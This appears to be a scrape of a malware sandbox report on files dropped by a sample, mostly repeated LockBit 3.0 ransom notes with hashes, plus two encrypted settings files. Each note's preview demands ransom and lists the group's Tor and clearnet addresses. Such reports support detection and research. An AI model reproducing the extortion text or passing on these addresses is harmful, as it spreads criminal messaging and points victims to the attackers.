                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977884553705045
                Encrypted:false
                SSDEEP:96:xwfNmAo9uXXrwKEN1eXStBeQW6eA/FDC/IkDisf34E//m/wAGJks9+QATUcv/cUC:sLHinR0A9DuX4o/Yh76e3fvLnERmy7yo
                MD5:083B16B9BC44D6A72494364B6B693128
                SHA1:47EFDC71F841285C07034A4EA00A48B12B836013
                SHA-256:9BF0CC536915DFDBEAB2B70C646485B06EAEFB360D9973CF25ED7C27191EBB26
                SHA-512:5F12EDA75455632C91A2557C048906BB678F05098B210459919E0A26318907087D14B285D426917C8710897CAE3B65B92574D60CB0D1EC14C932621593486043
                Malicious:false
                Preview:..F..:..+i...x.;....jk....gV...2..R.....Gv.".j.$..Z9K..c..c....]...r.g...Q......4k... .]..p..f.a?...$9..e._..."..~g..q..N:c.l._K...-'.^.*.M..c.8......._..*(Hcb.EV.q.fy.n.Ll...5j.pM.....r....._$.....m3+.>......te;.ME(f]....%...........N..G....N..b+.....,..N..}..V..H=.V...Wk.f.C0%I.0.....w.U...........1.{T.z8.(.B...d..p....V..>...W......N.7.WF....H\.....KN.......Ou.5x....c..o./\..hB.z.'..j.M. ..8.P..1..D.k..'(2.....+g...B......r.H...a....l.B....p..My.)...P.!..{.40..T.g......"h..70Op..-.J.)..._..Ak.Z0.{|Z.....Y9.u..h....[#.Ic..y.%.^.<.............J.... .:........h...i.`....dp.FO..;.M.....fa....nmVy<<[l..........b4.T...VK.9..o{...... v.Z..Y......[....v\..2\....0..=...... V.[..7<.K...a.....d.X=n.{'../1.Vl.....H9...m.^.....g"bFsK`9.=fIbV%....g..'k...>.........76.*.%ki^.p.$...d>.w.N.].b.).:..h..u......WiH..0..g....,.W...../....m.nFiO.v.<....s....uK..u...t#|M^[.`...*..4.3..9.m_(....)b)...+..;.e.3..i.d.#.g.de._..(.s..!.}<.K.:.bV....3.....r.....

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.9800908800049655
                Encrypted:false
                SSDEEP:192:DrrNSR0PZ+LD10PJijvyb9IVLuTE1UpiW/2t/CgwgXS0o:newZa1kOMumBiW/fgNX2
                MD5:FAB597D6D9F95822499F44AA0186D25C
                SHA1:A5CE7FCADD6879F2441E92D76640E9B45D75CFF9
                SHA-256:AB91FE00678CF9ECD96968E946D3A78A995B37459BE6D6E0EE63060E03D2B01B
                SHA-512:1F4BBDC14E8C6E064C3E00FC5F5442190ECE26505547631EDE685B21249DD7270E7A32D02F8BC622E4A4BCE6B89E6083D5AD2FEFDB7B66564D1CDBBB6C7A8712
                Malicious:false
                Preview:...a.oa......!(_......_.........L-d(.,.g.@@'_../;GSI...Q..,......e.*.........l..{.Q..j?T.a..O..<I.J9..J.2......@EZ.2..WM'..*..2..xg....u..o.L\..SA....."......dK..:%*......F.S_.e.U...v..S..f1..c.#z..9.oQ..W..0...5_..6[.j.!......jJ.....".S../8.......QbRA.eA.&.......*NP.M.t....M..~......l..Je.n.......B...$.bPg{..4Z.M.y.9....D.H.2I$.d...F...A....."....n@R,.....hZ........PY>..*..o\..p.^.)t+:..=p.... .:E...i...s|.r...3..Y.a.n.g^!.`.......O+.Q.$.;...[$dNO.Y.6..hO..g..K....I1}6...DT...oM..(.s.I.l..x.U+.>w..Z..W.[.....'.{...nG..]..N6.T...)pe..ok6|`)....V...j...i..\...7..~.b....%..6.1c+^..>.C.^d..../.'.LW2)Y...}p.1....,...#..C..y......'.bs..B..D.7D.J;.w..0..9V..;Z^=pT?...d.z2...I..L.........0P.T8..J......G.D..7.~.&|.3....(....,-_...p...S.t.w.gM....3.C.j.......sb.Sqt.....n.....$1..U.H;Y....U].bF.a.Q..v........!...N.....[.qz.Q.0.|6t..j...n:.Fm6.[.$oM.....e7...c.B*....r._..B....1Uq....b.F\X:jQY..ks..{dh.;.....*....V...0Y. .AH.J..I..{..I...VT..9.

